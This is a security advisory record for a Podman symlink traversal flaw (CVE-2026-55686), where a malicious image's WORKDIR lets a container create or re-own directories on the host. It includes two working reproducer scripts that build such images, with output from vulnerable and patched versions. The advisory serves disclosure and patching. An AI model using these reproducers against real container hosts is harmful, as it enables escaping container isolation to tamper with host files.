{"id":"CVE-2026-55686","title":"Podman: WORKDIR symlink traversal vulnerability","summary":"Podman: WORKDIR symlink traversal vulnerability","severity":"medium","cvss":5.3,"cwe":["CWE-59"],"vendor":"containers","product":"github.com/containers/podman/v5","affected":["github.com/containers/podman/v5 <= 5.7.0","github.com/containers/podman/v4 <= 4.9.5","github.com/containers/podman/v3 <= 3.4.7"],"patched":["github.com/containers/podman/v5 5.7.1"],"published":"2026-06-18","updated":"2026-06-18","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-q6r4-3wmg-fwcq","references":[{"url":"https://github.com/podman-container-tools/podman/security/advisories/GHSA-q6r4-3wmg-fwcq"},{"url":"https://github.com/podman-container-tools/podman/commit/7ce2e00ab140c11a68301f0b161f51984131a858"},{"url":"https://github.com/podman-container-tools/podman/commit/d18e44e9abb3bf5b7294aa70806e1368fdddfdd0"},{"url":"https://github.com/advisories/GHSA-q6r4-3wmg-fwcq"}],"tags":["ghsa","go"],"ingestedAt":"2026-06-19T03:39:00.821Z","ecosystem":"go","epss":0.00374,"epssPercentile":0.31151,"slug":"CVE-2026-55686","body":"## Overview\n\n### Summary\n\nRunning a malicous container image where the WORKDIR path contains a symlink can create a directory or modify ownership on the host filesystem. Modified ownership is less likely to happen as that requires help from an untrusted/malicious process that mutates the host filesystem tree during dereferencing of the WORKDIR path, to trigger a race condition.\n\n### Patch\n\nhttps://github.com/podman-container-tools/podman/commit/d18e44e9abb3bf5b7294aa70806e1368fdddfdd0\n\n### Details\n\nThis issue was fixed in podman 5.7.1 (git commit 7ce2e00ab140c11a68301f0b161f51984131a858)\n\n### PoC\n\nThe reproducer script _test1.bash_ demonstrates the vulnerability. \nThe directory  `/var/BREAKOUT` is created on the host.\nThe container process uses the container directory `/var/BREAKOUT` as current working directory.\n\nThe reproducer script _test2.bash_ demonstrates the same vulnerability. \nThe directory  `/var/BREAKOUT` is created on the host.\nThe container process uses the container directory `/usr/local` as current working directory.\n\nThe reproducer script _test2.bash_ shows that the working directory can be different from the breakout directory.\n\nReproducer **test1.bash**\n\n```\n#!/bin/bash\nset -o errexit\nset -o nounset\n\nif [ -e /var/BREAKOUT ]; then\n  echo error: path /var/BREAKOUT should not exist beforehand\n  exit 1\nfi\n\ndir=$(mktemp -d)\ncat > $dir/Containerfile << 'EOF'\nFROM docker.io/library/alpine\nRUN cd / && ln -s ../../../../../../../var symlink\nUSER 1234:1234\nWORKDIR /symlink/BREAKOUT\nCMD [\"/bin/sh\",\"-c\",\"echo current working directory: $(pwd)\"]\nEOF\n\npodman build -q --no-cache -t img $dir\npodman run --rm localhost/img\nls -ld /var/BREAKOUT\n```\n\n\nReproducer **test2.bash**\n\n```\n#!/bin/bash\nset -o errexit\nset -o nounset\n\nif [ -e /var/BREAKOUT ]; then\n  echo error: path /var/BREAKOUT should not exist beforehand\n  exit 1\nfi\n\ndir=$(mktemp -d)\ncat > $dir/Containerfile << 'EOF'\nFROM docker.io/library/alpine\nARG breakout_dirname=/var\nARG breakout_basename=BREAKOUT\nARG produce_pwd=/usr/local\nRUN mkdir -p /0/1/2/3 && \\\n    cd /0 && \\\n    ln -s 1/2/3 symlink1 && \\\n    mkdir -p /0/1/symlink2/${breakout_dirname} && \\\n    cd /0/1/symlink2/${breakout_dirname} && \\\n    ln -s ${produce_pwd} ${breakout_basename}\nRUN cd / && ln -s ../../../../../../.. symlink2\nUSER 1234:1234\nWORKDIR /0/symlink1/../../symlink2/${breakout_dirname}/${breakout_basename}\nCMD [\"/bin/sh\",\"-c\",\"echo current working directory: $(pwd)\"]\nEOF\n\npodman build -q --no-cache -t img $dir\npodman run --rm localhost/img\nls -ld /var/BREAKOUT\n```\n\n\n\nVulnerable:\n\npodman 5.7.0 using Fedora CoreOS 43.20251120.3.0\n\n```\nroot@localhost:~# bash test1.bash \n38c27b69c61941741f49c3f87b589b422391d5908659665cabf248934be0ed80\ncurrent working directory: /var/BREAKOUT\ndrwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT\nroot@localhost:~# rmdir /var/BREAKOUT/\nroot@localhost:~# bash test2.bash \nc3390edbe393a3f3b182e60c5900cf93444b5120fbe34dc305478b3b77a106c9\ncurrent working directory: /usr/local\ndrwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT\n```\n\nNot vulnerable:\n\npodman 5.7.1 using Fedora CoreOS 43.20260119.1.1\n\n```\nroot@localhost:~# bash test1.bash \n0229bf752a821d5b9bb8afcf4b94e8de2a4838798ae8065414b7f939b81d0788\ncurrent working directory: /var/BREAKOUT\nls: cannot access '/var/BREAKOUT': No such file or directory\nroot@localhost:~# bash test2.bash \n568584150a93a003feb8ae1985173bf50ced9cba4d52f9734cb70dc75eeb7c60\ncurrent working directory: /usr/local\nls: cannot access '/var/BREAKOUT': No such file or directory\n```\n\n### Credits\n\nWe like to thank Erik Sjölund (@eriksjolund) for reporting the security impact to us.\n\n## Affected packages\n\n- `github.com/containers/podman/v5 <= 5.7.0`\n- `github.com/containers/podman/v4 <= 4.9.5`\n- `github.com/containers/podman/v3 <= 3.4.7`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/containers/podman/v5 5.7.1`","depth":"sunlit","depthScore":29,"depthScoreParts":{"impact":29.2,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}